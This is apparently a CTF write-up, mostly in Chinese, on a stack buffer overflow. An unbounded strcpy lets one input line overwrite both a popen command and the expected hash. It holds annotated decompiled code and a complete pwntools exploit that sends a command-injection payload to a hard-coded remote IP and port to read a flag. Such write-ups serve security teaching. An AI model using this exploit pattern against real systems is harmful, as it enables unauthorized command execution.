一个简单的栈缓冲区溢出覆盖题：程序读入一行数据，对其计算哈希并与预存的哈希值比较，通过后用 popen 执行预存的命令。getline 读入的行长度不受限制，而 strcpy 把它原样拷进只有 256 字节的 dest，因此超出部分会依次覆盖紧随其后的 v14（popen 执行的命令，27 字节）和 v15（期望的哈希值，65 字节）——攻击者既控制被哈希的数据，也控制与之比较的"正确答案"。注：题目虽称 md5，但程序得到的摘要是 32 字节、输出 64 个十六进制字符，长度与 SHA-256 一致而非 MD5（16 字节），exp 中的哈希串长度也是 64。
/*
 * Decompiled main of the challenge binary (IDA output, kept verbatim).
 *
 * Flow: read one line -> strip trailing '\n' -> strcpy into dest[256] ->
 * hash dest into v16 -> hex-encode v16 into v17 -> strcmp(v15, v17) ->
 * popen(v14) and echo its output.
 *
 * The vulnerability is the unbounded strcpy() below: getline() returns a
 * line of arbitrary length, and dest is followed on the stack directly by
 * v14 (the command) and v15 (the expected hash), so a long line rewrites
 * both the hash the input is checked against and the command that runs.
 */
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char *v3; // rax
unsigned __int8 *v4; // rbp
char *v5; // rbx
__int64 v6; // rcx
char *v7; // rdi
unsigned int v8; // er12
FILE *v9; // rbp
size_t v11; // [rsp+0h] [rbp-308h] BYREF
char *lineptr; // [rsp+8h] [rbp-300h] BYREF
char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF  -- strcpy target, 0x100 bytes
char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF  -- immediately after dest: command passed to popen()
char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF  -- immediately after v14: expected hash (hex string)
_BYTE v16[32]; // [rsp+16Ch] [rbp-19Ch] BYREF  -- raw digest, 32 bytes (SHA-256-sized, not MD5's 16)
char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF  -- hex encoding of v16, 64 chars
int v18; // [rsp+1CCh] [rbp-13Ch] BYREF  -- first byte receives the NUL of the last snprintf below
char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]  -- stack-protector canary; sits above everything the overflow reaches
v20 = __readfsqword(0x28u);
sub_E60(dest); // presumably fills dest/v14/v15 with the stored command and hash -- not visible here, confirm in the binary
v11 = 0LL;
lineptr = 0LL;
if ( getline(&lineptr, &v11, stdin) == -1 ) // unbounded: the line is as long as the attacker wants
return 1;
v3 = strrchr(lineptr, 10); // dest:256, v14:cmd, v15:md5 -- input must contain a '\n' or the program exits
if ( !v3 )
return 1;
*v3 = 0;
v4 = v16;
v5 = v17;
strcpy(dest, lineptr); // BUG: no length check; bytes 256.. land in v14, 283.. in v15 (then v15[64] gets the NUL)
sub_DD0(dest, v16, 256LL); // presumably hash(dest, 256 bytes) -> v16; argument order inferred from the sizes, confirm
do
{
v6 = *v4;
v7 = v5;
v5 += 2;
++v4;
snprintf(v7, 3uLL, "%02x", v6); // 32 iterations, 2 hex chars each; final NUL spills into v18
}
while ( v5 != (char *)&v18 );
v8 = strcmp(v15, v17); // both sides attacker-influenced: v15 via the overflow, v17 via the hashed input
if ( v8 )
{
puts("wrong password!");
return 1;
}
v9 = popen(v14, "r"); // v14 has no terminator of its own once overwritten, so the shell also sees v15's bytes
if ( !v9 )
return 1;
while ( fgets(s, 256, v9) )
printf("%s", s);
fclose(v9); // popen() stream closed with fclose() rather than pclose() (as decompiled)
return v8;
}
exp:
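# Exploit for the overflow in main(): getline() reads an unbounded line and
# strcpy() copies it into dest[256], which is followed on the stack by
# v14 (27-byte command handed to popen) and v15 (65-byte expected hash).
# One line therefore sets the hashed data, the "correct" hash and the command.
import sys

DEST_SIZE = 256     # char dest[256]
CMD_SIZE = 27       # char v14[27] -- popen(v14, "r")
HASH_HEX_LEN = 64   # v15 is strcmp'd against 64 hex chars of the 32-byte digest

# Bytes that end up in dest and are hashed by the binary (sub_DD0(dest, v16, 256)
# appears to hash the 256-byte dest; confirm in the binary).
FILLER = b'A' * DEST_SIZE
# Hash the server expects for FILLER, taken from the original writeup; the
# length (64 hex chars) matches a 32-byte digest such as SHA-256, not MD5.
# Recompute it if FILLER changes.
EXPECTED_HASH = b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb'

DEFAULT_HOST = '111.200.241.244'
DEFAULT_PORT = 50769


def build_payload(cmd, digest_hex, filler=FILLER):
    """Return the line to send: filler | command padded to 27 | 64-char hash.

    cmd        -- shell command, at most CMD_SIZE bytes. It should end with ';'
                  because v14 has no NUL terminator of its own once overwritten:
                  popen() sees cmd + padding + digest as one string, so the
                  '#' padding turns the trailing hash into a shell comment.
    digest_hex -- the hash the server must compute for `filler`, as ASCII hex.
    filler     -- exactly DEST_SIZE bytes landing in dest.

    Raises ValueError on a size mismatch. bytes.ljust() never truncates, so
    without the check an over-long command would silently shift the hash and
    the server would answer "wrong password!".
    """
    if len(filler) != DEST_SIZE:
        raise ValueError('filler must be exactly %d bytes' % DEST_SIZE)
    if len(cmd) > CMD_SIZE:
        raise ValueError('command longer than %d bytes would misalign the hash' % CMD_SIZE)
    if len(digest_hex) != HASH_HEX_LEN:
        raise ValueError('digest must be %d hex chars' % HASH_HEX_LEN)
    return filler + cmd.ljust(CMD_SIZE, b'#') + digest_hex


if __name__ == '__main__':
    from pwn import remote
    host = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT
    p = remote(host, port)
    # sendline() appends the '\n' that getline()/strrchr() in main() require.
    p.sendline(build_payload(b'/bin/cat flag.txt;', EXPECTED_HASH))
    p.interactive()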